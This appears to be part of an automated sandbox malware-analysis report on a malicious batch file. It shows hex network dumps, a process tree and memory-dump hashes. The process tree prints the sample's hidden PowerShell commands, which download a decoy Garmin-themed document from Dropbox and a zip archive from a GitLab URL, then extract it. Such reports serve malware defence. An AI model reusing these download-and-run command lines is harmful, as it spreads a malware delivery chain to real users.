                                                                                                                                                                                                                2024-12-19 13:14:19 UTC1369INData Raw: 48 1a c8 06 67 e2 cd 7e 57 ee 30 e3 84 c2 5b 14 04 e2 81 20 cb 4c 16 1f 63 ae eb 9c 30 49 7a 0e 22 c9 0e d8 62 e4 b1 5d fd 57 a6 f9 e4 e8 ca c7 42 31 67 d8 0e a9 62 e4 03 a8 e9 11 61 05 a8 45 4b 83 fb 99 53 94 2a d8 ae 26 09 e1 6b 75 b3 77 02 99 39 21 90 f0 c0 34 67 a9 1a dd 7b 0a 1c d2 54 dc b1 27 b6 c6 6b 12 6b 3a 30 64 1d 18 5c ec c6 8c 0f 5d 6d bc 0f ef bc 4a ac 41 d3 d5 3c 3e 6c fd 85 f3 02 5d 23 26 0e 69 8d 8d f3 30 8b 20 9d ea ac a6 42 8c 6c 02 55 d7 fe 2d 07 40 d2 a6 ae 00 ff e2 97 62 91 97 59 6a a2 64 60 a2 6c 2b 5e 02 00 bf 75 91 e4 5d 10 16 c8 aa 6b c3 c1 91 32 a3 bb ae 29 a1 15 8f 52 57 86 2b af 25 0b 04 b4 41 a0 b7 cd a2 58 31 9b 3a 9a a4 b1 aa 1d e1 8f 70 b9 10 a2 8e 1f a1 5d 00 f7 22 d9 34 6a 94 59 c9 67 56 ad 44 9b c1 88 1c 64 07 61 e5 6d
                                                                                                                                                                                                                Data Ascii: Hg~W0[ Lc0Iz"b]WB1gbaEKS*&kuw9!4g{T'kk:0d\]mJA<>l]#&i0 BlU-@bYjd`l+^u]k2)RW+%AX1:p]"4jYgVDdam
                                                                                                                                                                                                                2024-12-19 13:14:19 UTC1369INData Raw: 49 c7 c8 d0 20 04 4b 20 8e 8e 05 c3 79 7f 28 4c 28 2d 76 38 66 3f 2a 24 59 7a 13 dd fe 2a af 8e 2d 32 64 d4 ec 1c a2 51 37 71 59 35 11 18 2b 0e 0e f8 56 ac 5b a5 fe 07 cc 5c bb 05 68 83 5b a1 49 47 67 c2 ae 0c 0f 45 06 08 85 5e bb d0 59 4f a1 d8 08 ed 83 7d 8e ce 9c bb 75 4b ab fa 81 a1 20 14 2a 4d 06 46 06 2e 8b a6 1c a0 1e 5d 31 d5 bd 62 f1 7b 4b 5a 91 6f 78 5b c6 47 04 b6 b1 7b 20 90 46 f5 a9 29 ff 58 37 8a 2d 64 b8 f6 3a 5a 49 dd 32 c1 cd 15 44 21 6e 0e 7f e1 b7 75 45 ad a0 60 69 bd 65 50 63 6b 08 c6 9b 7a cb 64 e9 27 c9 0b 22 c4 28 0a 3c 88 fd ca d9 e2 a7 e5 9e 18 b9 1b 44 5c 3f cc d3 23 05 79 c2 73 1f f3 06 84 b3 d3 13 a1 dc 2e 76 82 d9 06 66 b1 f4 5a 15 03 2e 27 ba 3d 21 b2 96 a9 0c 44 1b b4 81 db 03 ac 84 c8 97 7a 98 75 31 ed e3 10 18 8d 56 79 16
                                                                                                                                                                                                                Data Ascii: I K y(L(-v8f?*$Yz*-2dQ7qY5+V[\h[IGgE^YO}uK *MF.]1b{KZox[G{ F)X7-d:ZI2D!nuE`iePckzd'"(<D\?#ys.vfZ.'=!Dzu1Vy
                                                                                                                                                                                                                2024-12-19 13:14:19 UTC1369INData Raw: d9 02 f6 b3 f3 a2 c4 db 01 45 ff e6 fc b7 e3 f7 67 f0 08 6c 8c 97 52 09 88 3a 6b 09 87 1a 8f 53 74 46 23 24 05 9a 98 d8 74 8d 2a 63 35 89 97 be d1 9f d9 f2 c6 f0 03 5e d3 d3 f7 5c 56 e2 56 dc 1e 75 0a 8a 39 d6 e4 e4 6d 97 43 9c a4 c5 78 f3 4b af a5 01 dd 21 f0 dc e2 5d 09 b7 da 96 7b 79 a5 07 af 0f df b7 f8 bd 2e fe ca da f7 cf e7 cf 9f ff 30 7f f6 23 26 7a 0e 9e cf b4 0a 72 92 f4 27 ef f6 cf dd 9b 7c 70 81 09 00 f9 08 ac 8b d6 31 4c 47 df d2 50 93 bf 88 da 96 92 57 80 7e 79 15 0c e0 57 62 48 eb 17 1c 50 00 48 e7 eb 24 d9 13 0f cd 77 92 3c a7 19 3f f9 e1 e9 b3 ef 30 b3 76 f0 62 86 2c 83 64 e6 69 7a 4f e3 3a 64 84 35 30 df 8d f0 04 ae bc e1 4f ef f5 56 c0 e9 dc c0 40 4c b9 c1 85 3a 02 e7 88 4b 4f b1 11 37 da c0 72 db 4f 12 52 d9 5c 3e 69 22 92 f6 8b 75 ff
                                                                                                                                                                                                                Data Ascii: EglR:kStF#$t*c5^\VVu9mCxK!]{y.0#&zr'|p1LGPW~yWbHPH$w<?0vb,dizO:d50OV@L:KO7rOR\>i"u


                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                Target ID:0
                                                                                                                                                                                                                Start time:08:14:06
                                                                                                                                                                                                                Start date:19/12/2024
                                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\jhsdgfjkh236.bat" "
                                                                                                                                                                                                                Imagebase:0x7ff6d3f40000
                                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                Target ID:1
                                                                                                                                                                                                                Start time:08:14:06
                                                                                                                                                                                                                Start date:19/12/2024
                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                Imagebase:0x7ff620390000
                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                Target ID:3
                                                                                                                                                                                                                Start time:08:14:06
                                                                                                                                                                                                                Start date:19/12/2024
                                                                                                                                                                                                                Path:C:\Windows\System32\chcp.com
                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                Commandline:chcp.com 437
                                                                                                                                                                                                                Imagebase:0x7ff7d60b0000
                                                                                                                                                                                                                File size:14'848 bytes
                                                                                                                                                                                                                MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                Target ID:4
                                                                                                                                                                                                                Start time:08:14:06
                                                                                                                                                                                                                Start date:19/12/2024
                                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                Commandline:C:\Windows\system32\cmd.exe /c type tmp
                                                                                                                                                                                                                Imagebase:0x7ff6d3f40000
                                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                Target ID:5
                                                                                                                                                                                                                Start time:08:14:06
                                                                                                                                                                                                                Start date:19/12/2024
                                                                                                                                                                                                                Path:C:\Windows\System32\find.exe
                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                Commandline:find
                                                                                                                                                                                                                Imagebase:0x7ff6c9ae0000
                                                                                                                                                                                                                File size:17'920 bytes
                                                                                                                                                                                                                MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                Target ID:6
                                                                                                                                                                                                                Start time:08:14:06
                                                                                                                                                                                                                Start date:19/12/2024
                                                                                                                                                                                                                Path:C:\Windows\System32\findstr.exe
                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                Commandline:findstr /L /I set "C:\Users\user\Desktop\jhsdgfjkh236.bat"
                                                                                                                                                                                                                Imagebase:0x7ff718c10000
                                                                                                                                                                                                                File size:36'352 bytes
                                                                                                                                                                                                                MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                Target ID:7
                                                                                                                                                                                                                Start time:08:14:06
                                                                                                                                                                                                                Start date:19/12/2024
                                                                                                                                                                                                                Path:C:\Windows\System32\findstr.exe
                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                Commandline:findstr /L /I goto "C:\Users\user\Desktop\jhsdgfjkh236.bat"
                                                                                                                                                                                                                Imagebase:0x7ff718c10000
                                                                                                                                                                                                                File size:36'352 bytes
                                                                                                                                                                                                                MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                Target ID:8
                                                                                                                                                                                                                Start time:08:14:06
                                                                                                                                                                                                                Start date:19/12/2024
                                                                                                                                                                                                                Path:C:\Windows\System32\findstr.exe
                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                Commandline:findstr /L /I echo "C:\Users\user\Desktop\jhsdgfjkh236.bat"
                                                                                                                                                                                                                Imagebase:0x7ff718c10000
                                                                                                                                                                                                                File size:36'352 bytes
                                                                                                                                                                                                                MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                Target ID:9
                                                                                                                                                                                                                Start time:08:14:06
                                                                                                                                                                                                                Start date:19/12/2024
                                                                                                                                                                                                                Path:C:\Windows\System32\findstr.exe
                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                Commandline:findstr /L /I pause "C:\Users\user\Desktop\jhsdgfjkh236.bat"
                                                                                                                                                                                                                Imagebase:0x7ff718c10000
                                                                                                                                                                                                                File size:36'352 bytes
                                                                                                                                                                                                                MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                Target ID:10
                                                                                                                                                                                                                Start time:08:14:06
                                                                                                                                                                                                                Start date:19/12/2024
                                                                                                                                                                                                                Path:C:\Windows\System32\find.exe
                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                Commandline:find
                                                                                                                                                                                                                Imagebase:0x7ff6c9ae0000
                                                                                                                                                                                                                File size:17'920 bytes
                                                                                                                                                                                                                MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                Target ID:11
                                                                                                                                                                                                                Start time:08:14:06
                                                                                                                                                                                                                Start date:19/12/2024
                                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                Commandline:C:\Windows\system32\cmd.exe /c type tmp
                                                                                                                                                                                                                Imagebase:0x7ff6d3f40000
                                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                Target ID:12
                                                                                                                                                                                                                Start time:08:14:06
                                                                                                                                                                                                                Start date:19/12/2024
                                                                                                                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                Commandline:powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/mfmemsox3eb9769rgrajn/Garmin_Campaign_Information_for_Partners_V11.docx?rlkey=oy421vwzu8dsedagxt4w0ddsw&st=31jc5byu&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V11.docx')"
                                                                                                                                                                                                                Imagebase:0x7ff7b2bb0000
                                                                                                                                                                                                                File size:452'608 bytes
                                                                                                                                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                Target ID:13
                                                                                                                                                                                                                Start time:08:14:15
                                                                                                                                                                                                                Start date:19/12/2024
                                                                                                                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                Commandline:powershell -WindowStyle Hidden -Command "Start-Process 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V11.docx'"
                                                                                                                                                                                                                Imagebase:0x7ff7b2bb0000
                                                                                                                                                                                                                File size:452'608 bytes
                                                                                                                                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                Target ID:14
                                                                                                                                                                                                                Start time:08:14:16
                                                                                                                                                                                                                Start date:19/12/2024
                                                                                                                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                Commandline:powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://gitlab.com/fgh8090051/jgh/-/raw/main/FGa1812.zip', 'C:\Users\Public\Document.zip')"
                                                                                                                                                                                                                Imagebase:0x7ff7b2bb0000
                                                                                                                                                                                                                File size:452'608 bytes
                                                                                                                                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                Target ID:19
                                                                                                                                                                                                                Start time:08:16:10
                                                                                                                                                                                                                Start date:19/12/2024
                                                                                                                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                Commandline:powershell.exe -WindowStyle Hidden -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document')"
                                                                                                                                                                                                                Imagebase:0x7ff7b2bb0000
                                                                                                                                                                                                                File size:452'608 bytes
                                                                                                                                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                Reset < >
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 0000000C.00000002.1370869165.00007FF7C1130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1130000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_7ff7c1130000_powershell.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID: .C_H
                                                                                                                                                                                                                  • API String ID: 0-1448197297
                                                                                                                                                                                                                  • Opcode ID: f223fd7e196743c7e96764b122f48cccd2998fe28015e8ef442eed3334b0d4ae
                                                                                                                                                                                                                  • Instruction ID: 22dfe8244fd7005221d6ba208577b585ffdb77b581f2b8cb73e6ac32436b2e81
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f223fd7e196743c7e96764b122f48cccd2998fe28015e8ef442eed3334b0d4ae
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4F324731A0DFC94FE796AB3868552B8BBE0EF46760B8801FBD049C7197D958A805C362
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 0000000C.00000002.1370869165.00007FF7C1130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1130000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_7ff7c1130000_powershell.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                  • Opcode ID: 8e520e10012c6dab6445d59127c332023a92e636b4c20479fedc75d43eb74198
                                                                                                                                                                                                                  • Instruction ID: 061824df4efe617d112633a93051ecd63fd5fefc49016a09dc9949771e8910a9
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8e520e10012c6dab6445d59127c332023a92e636b4c20479fedc75d43eb74198
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FDD1577191DAC94FE796EB3868151B9BBE0FF46720B8801FED04DC7193DA1CA805C365
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 0000000C.00000002.1370869165.00007FF7C1130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1130000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_7ff7c1130000_powershell.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                  • Opcode ID: 128b8a88162990afc4abc45e1fe20dff2fe2c84d76fec8c92b0bb0393589dc6a
                                                                                                                                                                                                                  • Instruction ID: 63b788263359512aba7b350f72683b1f24d3cdcfc31caef72f7ee66c4468a31b
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 128b8a88162990afc4abc45e1fe20dff2fe2c84d76fec8c92b0bb0393589dc6a
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7C314826A1EE864FF7ADBE286862178F2C1EF01A75BC400BEC00DC309ADD5CEC058721
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 0000000C.00000002.1370473118.00007FF7C1060000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1060000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_7ff7c1060000_powershell.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                  • Opcode ID: d3018d185270f09d679e4fb71a88b6ef8450c789612176cac0f9877b3821b575
                                                                                                                                                                                                                  • Instruction ID: cfd06628fd8582eca09056ff6747854ec2c9ce557caa704222162db653f038e3
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d3018d185270f09d679e4fb71a88b6ef8450c789612176cac0f9877b3821b575
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5301A73020CB0C8FDB44EF0CE451AA5B3E0FB95360F10052DE58AC3665D632E881CB45
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 0000000E.00000002.2522894339.00007FF7C10E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C10E0000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_7ff7c10e0000_powershell.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                  • Opcode ID: fe031745ba7a233b559c649324d3ee18034e24aba57c6e81b47e12dcacbb7716
                                                                                                                                                                                                                  • Instruction ID: f7dd05b1f078dbc6b5716d98ff2e5113a49394985c7386f15331e54e7e7a6546
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fe031745ba7a233b559c649324d3ee18034e24aba57c6e81b47e12dcacbb7716
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 54D1B230A08A4E8FDB98EF5CC445AE9BBF1FF58310F55817AD449DB291CA74E881CB90
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 0000000E.00000002.2523433187.00007FF7C11B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C11B0000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_7ff7c11b0000_powershell.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                  • Opcode ID: 73c32fdeb7d499bef4da86a298451e11729f57b72d6535b1eebf7657989b1d28
                                                                                                                                                                                                                  • Instruction ID: 2afdfe2700784ee2b9dea33743df8914fb68f1cc6e8544099f5a07272d975073
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 73c32fdeb7d499bef4da86a298451e11729f57b72d6535b1eebf7657989b1d28
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6A512A72B1DE4A4FE7A9EE2C68522B8B3E1EF45760B9401BEC44DC3193ED1DE8058395
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 0000000E.00000002.2523433187.00007FF7C11B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C11B0000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_7ff7c11b0000_powershell.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                  • Opcode ID: 1e554514339021fe63d810145eb4b99c6cd14c64ebf5af9bcefde56377d12304
                                                                                                                                                                                                                  • Instruction ID: 6eb99d10c8fd466dab74e3293c8bbd70c94f69d5ed2e5a03d230632eb2946250
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1e554514339021fe63d810145eb4b99c6cd14c64ebf5af9bcefde56377d12304
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F5312666A1EE8A0FF7A9EF286855278F2E1EF01A65B9401BEC80DC3192DD5CA8058255
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 0000000E.00000002.2522894339.00007FF7C10E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C10E0000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_7ff7c10e0000_powershell.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                  • Opcode ID: 348d5fb5261f51f812e1f49a056d31a35d386422633fb1efa08e0a84813b5c5b
                                                                                                                                                                                                                  • Instruction ID: fab29060616a9cb8b38b7b3839f89a0c099f4e220105e80c5773d3574ed063c2
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 348d5fb5261f51f812e1f49a056d31a35d386422633fb1efa08e0a84813b5c5b
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4501677111CB0C4FDB48EF0CE451AA5B7E0FB99364F50056DE58AC3655D636E881CB45
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000013.00000002.2564730966.00007FF7C1190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1190000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_7ff7c1190000_powershell.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 0-3916222277
                                                                                                                                                                                                                  • Opcode ID: 23559e189272f288421ce35cfaaff160d8476c28b6853b4fb82940310182f261
                                                                                                                                                                                                                  • Instruction ID: 195fe1759cfe7335f802333806231615b91ad8d3327a5052d7b4b06a7ff3893b
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 23559e189272f288421ce35cfaaff160d8476c28b6853b4fb82940310182f261
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 03915C30A0CA584FD7A4EF2CA8156B5BBD1EF99720F1502BBE09DC7256C9289C428391
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000013.00000002.2564730966.00007FF7C1190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1190000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_7ff7c1190000_powershell.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                  • Opcode ID: fc153b7ce1140e60cc0feb3e6ea114b5e581763c747d11ad992f499503237bb5
                                                                                                                                                                                                                  • Instruction ID: 9fc29a47d2746ced7374fa074fd042229e5d0f3841b64f7070c12a8764ef3977
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fc153b7ce1140e60cc0feb3e6ea114b5e581763c747d11ad992f499503237bb5
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: ABA1C430B18D4A8FE794AB2864553BDB3D2FF89764F8441BAD45ED3292DE6CB8024391
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000013.00000002.2564730966.00007FF7C1190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1190000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_7ff7c1190000_powershell.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                  • Opcode ID: 8f2c578b8ed7aa947903f888eb98e465e334a08ce012e3637ca352fb1b80b172
                                                                                                                                                                                                                  • Instruction ID: 60366b937f76621fcabff1bcfe7ef81c877181160049c5d7b2a9ff04e086c04c
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8f2c578b8ed7aa947903f888eb98e465e334a08ce012e3637ca352fb1b80b172
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D8718521F14D1A4FEB94FB6DA4156BDA3D3FF58760F800275D05EC3696DE2CA8428391
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000013.00000002.2564730966.00007FF7C1190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1190000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_7ff7c1190000_powershell.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
